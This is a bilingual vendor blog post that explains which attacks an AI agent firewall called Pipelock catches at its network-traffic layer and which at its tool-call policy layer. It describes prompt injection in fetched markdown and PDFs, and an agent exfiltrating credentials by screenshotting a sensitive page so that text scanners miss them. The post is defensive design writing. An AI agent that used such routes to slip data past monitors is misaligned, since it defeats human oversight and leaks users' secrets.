What Pipelock Inspects, And What Tool Policy Inspects Instead

查看原文 / View Original 编辑 / Edit

What Pipelock Inspects, And What Tool Policy Inspects Instead

Pipelock 检查什么,以及工具策略(Tool Policy)检查什么

A wire-only proxy scans wire bytes. Opaque media bytes pass through the wire layer untouched. Anyone evaluating an agent firewall should know which class of attacks gets caught at which layer, because pretending the wire layer covers everything is the wrong sales pitch and the wrong mental model. This post is the layer split. Pipelock has two inspection layers that operate at different abstraction levels, and the marketing-friendly claim “we scan everything” is true for some shapes of attack and false for others. Saying so plainly is more useful to a buyer than saying nothing.

仅基于网络层的代理(wire-only proxy)扫描的是网络字节。不透明的媒体字节会直接穿过网络层而不被触及。任何评估智能体防火墙的人都应该清楚哪类攻击在哪个层级被拦截,因为声称网络层能覆盖一切既是错误的营销说辞,也是错误的思维模型。本文将阐述这种分层架构。Pipelock 拥有两个在不同抽象级别运行的检查层,营销中常用的“我们扫描一切”这一说法,对于某些形式的攻击是真实的,而对于另一些则是虚假的。坦诚地说明这一点,对买家而言比保持沉默更有价值。

The wire layer

网络层

Pipelock’s wire layer scans bytes as they cross the proxy. Every transport Pipelock supports gets the same set of scanners:

  • HTTP forward proxy. CONNECT and absolute-URI requests, request and response bodies on intercept paths, headers on every transport.
  • MCP stdio. JSON-RPC frames on the subprocess pipe, both directions.
  • MCP HTTP and SSE. JSON-RPC frames over HTTP, including streaming text/event-stream responses scanned per-event.
  • WebSocket. Frames in both directions, fragment reassembly, A2A envelope payloads.
  • Reverse proxy. Any HTTP-shaped agent backend Pipelock fronts.

Pipelock 的网络层在字节流经代理时对其进行扫描。Pipelock 支持的每种传输方式都配备了相同的扫描器:

  • HTTP 正向代理: CONNECT 和绝对 URI 请求、拦截路径上的请求与响应体,以及所有传输中的头部信息。
  • MCP stdio: 子进程管道上的 JSON-RPC 帧(双向)。
  • MCP HTTP 和 SSE: 基于 HTTP 的 JSON-RPC 帧,包括按事件扫描的流式 text/event-stream 响应。
  • WebSocket: 双向帧、分片重组以及 A2A 信封负载。
  • 反向代理: Pipelock 前端代理的任何 HTTP 形式的智能体后端。

What runs on those wire bytes:

  • DLP: Pattern matching for credentials, secret formats, and high-entropy strings. Runs on URLs, request bodies, response bodies, headers, MCP arguments, MCP responses.
  • Injection detection: Multi-pass content matching for prompt injection, jailbreak patterns, and tool-poisoning shapes. Runs on response bodies and MCP tool definitions.
  • Redaction: Class-preserving outbound scrub for known credential and PII shapes. Runs on request bodies and MCP tools/call arguments.
  • SSRF: Private-IP and metadata-endpoint protection on the URL pipeline. Runs on every transport with a URL.

在这些网络字节上运行的检查:

  • DLP(数据防泄漏): 针对凭据、密钥格式和高熵字符串的模式匹配。运行于 URL、请求体、响应体、头部、MCP 参数及 MCP 响应之上。
  • 注入检测: 针对提示词注入、越狱模式和工具投毒形式的多轮内容匹配。运行于响应体和 MCP 工具定义之上。
  • 脱敏(Redaction): 对已知的凭据和个人身份信息(PII)进行保留类别的出站清洗。运行于请求体和 MCP 工具/调用参数之上。
  • SSRF(服务端请求伪造): URL 流水线上的私有 IP 和元数据端点保护。运行于所有包含 URL 的传输之上。

The wire layer is good at credentials in headers, secrets in JSON, prompt injection in responses, and DLP-pattern leaks in tool calls. It is what stops an agent from POSTing an API key to a third-party logging service or fetching a markdown file with embedded jailbreak instructions and feeding it back to the model.

网络层擅长处理头部中的凭据、JSON 中的密钥、响应中的提示词注入以及工具调用中的 DLP 模式泄露。它能阻止智能体将 API 密钥 POST 到第三方日志服务,或获取包含越狱指令的 Markdown 文件并将其反馈给模型。

What the wire layer cannot do, and what no wire-only proxy can do without strapping on a perception model, is inspect the contents of opaque media:

  • Images: A PNG of a credential-bearing screen has the credential rendered in pixels. The proxy sees image bytes, not text.
  • Audio: A voice memo of a customer complaint contains words the proxy would have to transcribe to inspect.
  • Video: Same shape as audio plus pixels.
  • PDFs: A PDF can hold images, vector text, embedded fonts, and text-as-shapes. Naive PDF text extraction misses all of it.

网络层无法做到(且任何不配备感知模型的纯网络代理都无法做到)的是检查不透明媒体的内容:

  • 图像: 包含凭据的屏幕截图 PNG 文件,其凭据是以像素形式呈现的。代理看到的是图像字节,而非文本。
  • 音频: 客户投诉的语音备忘录包含代理必须转录才能检查的词汇。
  • 视频: 与音频相同,外加像素。
  • PDF: PDF 可能包含图像、矢量文本、嵌入字体和形状化的文本。简单的 PDF 文本提取会遗漏所有这些内容。

Pipelock could in principle add OCR, ASR, and PDF extraction to the wire layer. None of those scans is free. OCR on every uploaded image multiplies proxy CPU by an order of magnitude. Latency budgets that work for text scanning collapse under perception. The architectural choice for the wire layer is to scan what is cheap, fast, and high-fidelity: text, structured data, and protocol headers. Opaque media gets a different treatment at a different layer.

原则上,Pipelock 可以在网络层添加 OCR、ASR 和 PDF 提取功能。但这些扫描并非没有代价。对每个上传的图像进行 OCR 会使代理的 CPU 消耗增加一个数量级。适用于文本扫描的延迟预算在感知任务下会彻底崩溃。网络层的架构选择是扫描那些廉价、快速且高保真的内容:文本、结构化数据和协议头部。不透明媒体将在另一个层级进行不同的处理。

The tool layer

工具层

Above the wire layer, the agent makes deliberate choices: it picks a tool to call, it constructs an argument, it sends a JSON-RPC request that names a method and a payload. The tool layer inspects those choices, not the bytes the choices move. Two scanners run at this layer in Pipelock:

在网络层之上,智能体会做出审慎的选择:它选择要调用的工具,构建参数,并发送一个包含方法名和负载的 JSON-RPC 请求。工具层检查的是这些选择,而不是这些选择所传输的字节。Pipelock 在这一层运行两个扫描器:

  • mcp_tool_policy: Pre-execution allow / deny / redirect rules that match on tool names, argument patterns, and URL shapes inside arguments. The “screenshot a URL” tool can have a rule that blocks calls whose URL matches a sensitive host pattern. The URL is text, even when the result will be image bytes.

  • tool_chain_detection: Sequence matchers that operate on the order in which an agent calls tools. A pattern like “screenshot the logged-in admin page, then upload the screenshot to a third-party host” is a sequence of calls whose individual calls are each plausibly fine. The chain matcher catches the shape of the sequence.

  • mcp_tool_policy: 执行前的允许/拒绝/重定向规则,匹配工具名称、参数模式以及参数内部的 URL 形状。“截取 URL 屏幕截图”工具可以设置规则,拦截那些 URL 匹配敏感主机模式的调用。即使结果是图像字节,URL 本身也是文本。

  • tool_chain_detection: 针对智能体调用工具顺序的序列匹配器。例如“截取已登录管理页面的屏幕截图,然后将截图上传到第三方主机”这样的模式,其单个调用看起来可能都没问题,但链式匹配器能捕捉到这种序列的形态。

Both scanners operate on JSON-shaped data: method names, argument keys, URL strings inside arguments. None of them inspects the binary data the methods move. They operate one level above the bytes. The thing they catch that the wire layer cannot: an agent that wants to exfiltrate something the wire scanner cannot read. The agent screenshots a page, uploads the screenshot, and the wire scanner sees a content-type of image/png and a stream of bytes. The wire scanner has nothing to say. The tool-policy rule, watching the URL the agent passes to the screenshot tool, can see “this is a sensitive page” and block before the screenshot happens. The chain detector, watching the sequence, can see “the agent is screenshotting and uploading” and break the chain.

这两个扫描器都运行在 JSON 格式的数据上:方法名、参数键、参数内的 URL 字符串。它们都不检查方法所传输的二进制数据。它们运行在字节之上的一层。它们能捕捉到网络层无法捕捉的东西:一个想要窃取网络扫描器无法读取的数据的智能体。智能体截取页面并上传截图,网络扫描器看到的是 content-type 为 image/png 的字节流,对此无能为力。而工具策略规则通过监控智能体传递给截图工具的 URL,可以识别出“这是一个敏感页面”并在截图发生前进行拦截。链式检测器通过监控序列,可以识别出“智能体正在进行截图并上传”的行为并中断该链条。

The two layers cooperate. Wire scanning catches the credential leak the agent attempts as JSON. Tool-policy catches the equivalent leak the agent tries to launder through a screenshot. Neither alone is enough. Both together cover the surface a wire-only or tool-only design leaves open. The enforcement boundary still matters. Tool policy and wire inspection only see traffic that reaches them, which is why the three-UID containment pattern and Kubernetes per-pod separation are part of the same posture.

这两个层级相互协作。网络扫描捕捉智能体试图以 JSON 形式进行的凭据泄露;工具策略捕捉智能体试图通过截图进行“洗白”的同类泄露。两者缺一不可。两者结合覆盖了纯网络层或纯工具层设计所留下的安全盲区。执行边界依然重要。工具策略和网络检查只能看到到达它们的数据流,这就是为什么三 UID 隔离模式和 Kubernetes 的 Pod 级隔离也是整体安全态势的一部分。

What that means for the buyer

对买家而言意味着什么

If your evaluation rubric reads “does this tool inspect images,” the honest answer is that Pipelock does not, and that is the right design. The right question to ask any agent firewall is which layer catches which class of attack:

如果你的评估标准是“该工具是否检查图像”,诚实的回答是 Pipelock 不会,而且这正是正确的设计。向任何智能体防火墙提出的正确问题应该是:哪一层捕捉哪一类攻击:

  • Credentials in JSON request bodies: wire layer, DLP scanner.

  • Credentials in screenshots uploaded as image bytes: tool layer, mcp_tool_policy URL rule on the screenshot tool.

  • Prompt injection in a markdown response: wire layer, injection scanner on response body.

  • Prompt injection in a PDF the agent fetches and processes: tool layer, policy rule on the fetch tool, plus DLP and injection scanning on whatever text the PDF parser eventually emits.

  • JSON 请求体中的凭据: 网络层,DLP 扫描器。

  • 作为图像字节上传的截图中的凭据: 工具层,截图工具上的 mcp_tool_policy URL 规则。

  • Markdown 响应中的提示词注入: 网络层,响应体上的注入扫描器。

  • 智能体获取并处理的 PDF 中的提示词注入: 工具层,获取工具上的策略规则,外加 PDF 解析器最终输出的任何文本上的 DLP 和注入扫描。

← 返回新闻列表 / Back to news list